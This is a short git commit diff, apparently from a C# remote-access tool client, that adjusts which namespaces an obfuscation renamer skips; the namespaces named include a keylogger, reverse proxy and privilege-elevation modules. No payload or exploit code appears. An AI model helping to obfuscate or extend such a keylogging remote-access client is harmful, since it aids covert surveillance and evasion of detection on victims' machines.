#209
This commit is contained in:
MaxXor 2015-06-09 08:35:49 +02:00
parent 8284da5830
commit 1e0a1d8b2c
1 changed files with 4 additions and 3 deletions

View File

@ -59,13 +59,14 @@ public bool Perform()
private void RenameInType(TypeDefinition typeDef)
{
if (typeDef.Namespace.StartsWith("My")
|| typeDef.Namespace.StartsWith("xClient.Core.Packets")
|| typeDef.Namespace == "xClient.Core"
|| typeDef.Namespace == "xClient.Core.Elevation"
|| typeDef.Namespace == "xClient.Core.Compression"
|| typeDef.Namespace == "xCore.Client.Networking"
|| typeDef.Namespace.StartsWith("ProtoBuf")
|| typeDef.Namespace.Contains("xClient.Core.ReverseProxy")
|| typeDef.Namespace.Contains("xClient.Core.Keylogger")
|| typeDef.Namespace.StartsWith("xClient.Core.ReverseProxy")
|| typeDef.Namespace.StartsWith("xClient.Core.Keylogger")
|| typeDef.Namespace.StartsWith("xClient.Core.Packets")
|| typeDef.HasInterfaces)
return;